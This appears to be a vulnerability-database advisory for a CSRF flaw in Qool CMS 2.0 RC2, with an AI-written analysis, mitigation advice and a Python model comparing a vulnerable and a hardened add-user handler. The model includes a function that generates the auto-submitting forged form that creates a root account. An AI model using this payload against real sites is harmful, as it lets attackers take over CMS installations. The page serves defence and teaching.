VYPR
Medium severity (CVSS 5.3, NVD Advisory) · Published Mar 16, 2026 · Updated Apr 15, 2026

CVE-2013-20005

Description

Qool CMS 2.0 RC2 contains a cross-site request forgery (CSRF) vulnerability that allows attackers to perform administrative actions by tricking a logged-in administrator into visiting a malicious web page. Attackers can forge POST requests to the /admin/adduser endpoint with the parameters username, password, email, and level to create root-level user accounts without the administrator's knowledge or consent.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Qool CMS 2.0 RC2 lacks CSRF protection on the /admin/adduser endpoint, allowing attackers to create root-level accounts by tricking authenticated admins into visiting a malicious page.

Vulnerability

Overview

Qool CMS 2.0 RC2 is vulnerable to cross-site request forgery (CSRF) because it does not verify that a POST to the /admin/adduser endpoint originated from its own admin interface; the browser attaches the administrator's session cookie to the request automatically, so the CMS processes it as if the administrator had submitted the form. An attacker can therefore craft a malicious HTML page that, when visited by an authenticated administrator, automatically submits a forged POST containing the parameters username, password, email, and level to create a new user account with root-level privileges (level 1) [1][2].

Exploitation

Exploitation requires no authentication on the attacker's part; the attack relies on social engineering to lure an administrator who holds an active session to a malicious web page, and the attacker must know (or guess) the URL of the CMS's admin endpoint. The proof-of-concept exploit, published in the Exploit Database, demonstrates a simple HTML form that auto-submits to the vulnerable endpoint, creating a user named "qoolio" with a password of "pass251" and root-level access [2]. The attack is trivial to execute and does not require any special network position beyond the ability to host a web page or send a crafted link. One caveat for anyone reproducing it today: browsers that apply SameSite=Lax by default to cookies set without an explicit SameSite attribute will withhold the session cookie from a cross-site form POST, which blunts the published PoC; that browser behaviour did not exist in 2013 and is not a substitute for a fix in the application.

Impact

Successful exploitation grants the attacker a fully privileged root-level account on the Qool CMS instance. With this account, the attacker can perform any administrative action, including modifying site content, managing users, and potentially executing code through the CMS's extension system. The vulnerability effectively compromises the entire CMS installation [1][3].

Mitigation

As of the original advisory (March 2013), no patch was available from the vendor, and none has been recorded since (see Patches below). The affected version, Qool CMS 2.0 RC2, is likely end-of-life. Until a fix exists, the practical controls are to restrict the admin panel to trusted networks (IP allow-list or VPN), to have the session cookie set with SameSite=Lax or SameSite=Strict at the application or reverse proxy, and, where the code can be modified, to add a per-session anti-CSRF token to the add-user form and reject POSTs whose Origin header is not the site's own. Placing HTTP basic authentication in front of the admin panel does not by itself stop CSRF: the browser replays cached basic-auth credentials on cross-site requests just as it replays session cookies. Otherwise, migrate to a supported CMS. The vulnerability is not currently listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.
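The following Python model is an added example, not code from Qool CMS or from the published PoC. It ties the Exploitation and Mitigation sections together: it builds the auto-submitting attacker page and the forged request the victim's browser would send (the parameter names and the "qoolio"/"pass251"/level 1 values come from the advisory; the hostnames cms.example and evil.example, the email value and the session handling are assumptions), then runs that request against a handler that behaves as RC2 is described (session cookie is the only check) and against a hardened handler that requires a per-session token and a matching Origin. It also models which cookies a browser attaches to a cross-site POST, so the SameSite caveat above can be seen in the same run.

```python
"""Model of CSRF on POST /admin/adduser: forged request vs. token/Origin checks."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

ADMIN_ORIGIN = "https://cms.example"       # assumed host running the CMS
ATTACKER_ORIGIN = "https://evil.example"   # assumed attacker-controlled host
ENDPOINT = "/admin/adduser"
ROOT_LEVEL = 1                              # level 1 = root, per the advisory

# Parameters the published PoC submits (names/values from the advisory; email is assumed).
POC_FORM = {"username": "qoolio", "password": "pass251",
            "email": "qoolio@evil.example", "level": str(ROOT_LEVEL)}


def poc_html(target_origin):
    """Attacker page: a hidden form that auto-submits when the victim's browser loads it."""
    inputs = "".join(f'<input type="hidden" name="{k}" value="{v}">'
                     for k, v in POC_FORM.items())
    return (f'<form id="f" method="POST" action="{target_origin}{ENDPOINT}">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


@dataclass
class Request:
    origin: Optional[str]   # Origin header; browsers send it on cross-site POSTs
    cookies: dict           # cookies the browser attached automatically
    form: dict              # POST body parameters


@dataclass
class Server:
    users: dict = field(default_factory=dict)
    sessions: dict = field(default_factory=dict)   # sid -> {"user", "csrf"}

    def login(self, user):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_hex(16)}
        return sid

    def csrf_token(self, sid):
        return self.sessions[sid]["csrf"]

    def _add(self, form):
        self.users[form["username"]] = {"email": form["email"], "level": int(form["level"])}
        return 200, "user added"

    def adduser_vulnerable(self, req):
        """RC2 behaviour as described: a valid session cookie is the only check."""
        if req.cookies.get("sid") not in self.sessions:
            return 401, "not logged in"
        return self._add(req.form)

    def adduser_hardened(self, req):
        """Synchronizer token plus Origin check; the session cookie alone is not enough."""
        sess = self.sessions.get(req.cookies.get("sid"))
        if sess is None:
            return 401, "not logged in"
        # Primary defence: the token is embedded in the CMS's own form, which a
        # cross-site page cannot read. Constant-time compare avoids leaking it.
        if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf"]):
            return 403, "missing or wrong csrf token"
        # Defence in depth: a browser-supplied Origin that is not ours is cross-site.
        if req.origin is not None and req.origin != ADMIN_ORIGIN:
            return 403, "cross-site origin"
        return self._add(req.form)


def browser_cookies(jar, cross_site):
    """Cookies a browser attaches to a top-level form POST. jar: {name: (value, samesite)}.
    A cross-site POST gets only SameSite=None cookies: Lax cookies ride only on top-level
    safe (GET) navigations and Strict cookies never cross site. (Chromium treats an unset
    attribute as Lax, with a short 'Lax+POST' grace period that this model ignores.)"""
    return {name: val for name, (val, samesite) in jar.items()
            if not cross_site or samesite == "None"}


def forged_request(sid, samesite="None"):
    """Admin with a live session loads the attacker page; the browser POSTs for them."""
    jar = {"sid": (sid, samesite)}
    return Request(ATTACKER_ORIGIN, browser_cookies(jar, cross_site=True), dict(POC_FORM))


def legit_request(sid, token):
    """Admin submits the real add-user form from the CMS itself."""
    jar = {"sid": (sid, "None")}
    form = dict(POC_FORM, csrf_token=token)
    return Request(ADMIN_ORIGIN, browser_cookies(jar, cross_site=False), form)


def demo():
    """Status codes for each scenario plus whether the forged root account was created."""
    srv = Server()
    sid = srv.login("admin")
    results = {
        "vuln_forged": srv.adduser_vulnerable(forged_request(sid))[0],
        "hard_forged": srv.adduser_hardened(forged_request(sid))[0],
        "hard_legit": srv.adduser_hardened(legit_request(sid, srv.csrf_token(sid)))[0],
        "vuln_forged_lax_cookie": srv.adduser_vulnerable(forged_request(sid, "Lax"))[0],
    }
    results["root_created"] = srv.users.get("qoolio", {}).get("level") == ROOT_LEVEL
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The run shows the whole story in four status codes: the unprotected handler accepts the forged POST (200) and a root-level "qoolio" exists afterwards; the hardened handler rejects the same POST (403) because the attacker page cannot supply the per-session token, while the administrator's own form submission still succeeds; and the same forged POST fails against even the unprotected handler (401) once the session cookie is SameSite=Lax, because the browser never attaches it.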

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)


References: 3

News mentions: 0 (no linked articles in the index yet)